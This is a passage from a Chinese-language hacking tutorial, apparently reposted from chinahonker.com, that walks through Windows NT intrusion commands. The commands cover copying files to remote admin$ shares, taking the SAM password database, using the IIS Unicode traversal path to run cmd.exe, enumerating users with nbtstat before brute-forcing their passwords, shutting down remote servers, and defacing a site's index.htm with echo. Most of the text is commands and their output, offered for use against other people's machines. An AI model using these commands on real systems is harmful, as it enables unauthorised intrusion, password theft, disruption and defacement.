入侵命令2

下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:/下,傳到對方D:/

get c:/index.htm d:/

假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下

put c:/index.htm d:/

5:copy

下面我說說怎樣把本地的文件複製到對方硬盤上去,需要建立好IPC$連接纔有效。

這裏我們把本地C盤下的index.htm複製到127.0.0.1的C盤下

copy index.htm //127.0.0.1/c$/index.htm

----------------------

如果你要複製到D盤下把C改爲D,就行了!

copy index.htm //127.0.0.1/d$/index.htm

----------------------

如果你要把他複製到WINNT目錄裏

就要把輸入

copy index.htm //127.0.0.1/admin$/index.htm

admin$是winnt

----------------------

要把對方的文件複製過來,順便告訴大家NT的備份的數據庫放在x:/winnt/repair/sam._ sam._是數據庫的文件名

下面就把127.0.0.1的數據庫複製到本地C盤下

copy //127.0.0.1/admin$/repair/sam._ c:/

----------------------

6:set

如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才準有),當然他的80端口要開,不然你黑給誰看。這時需要用SET命令!

下面是我得到的結果!我來分析它,只是找主頁在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:/WINNT/system32/cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP,這裏本來是顯示我的IP,被我刪除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:/WINNT/system32/os2/dll;
OS=Windows_NT
Path=D:/WINNT/system32;D:/WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:/vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這裏是E:/vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:/WINNT
TZ=GMT-9
USERPROFILE=D:/WINNT/Profiles/Default User
windir=D:/WINNT

粉紅色的那行就是對方主頁存放地址,這裏告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是主頁的名稱了。

7:nbtstat

如果你掃到一部NT的機子,他的136到139其中一個端口開了的話,就要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破解吧!

現在網上很多NT的機子都開了這些端口的,你可以練習下,我們來分析得到的結果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大寫哦。

下面是得到的結果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP


粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用戶。

這裏的用戶是PENTIUMII。

8:Shutdown

關了對方的NT服務器的命令

Shutdown //IP地址 t:20

20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。

9:DIR

這個命令沒什麼好講,但是卻非常重要,他是查看一目錄裏的所有文件、文件夾。

你可以本地試下。

10:echo

著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。

我們假設我們要把“南京大屠殺鐵證如山,任何日本人不得抵賴!”寫入index.htm,有2種方法,大家看看有什麼區別。

echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>index.htm

echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>>index.htm

第一個的意思是覆蓋index.htm原有的內容,把“南京大屠殺鐵證如山,任何日本人不得抵賴!”寫進index.htm。

第二個的意思是把“南京大屠殺鐵證如山,任何日本人不得抵賴!”加到index.htm裏面。

“>>”產生的內容將追加進文件中,“>”則將原文件內容覆蓋。

大家可以本地試下。

本文選自www.chinahonker.com

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章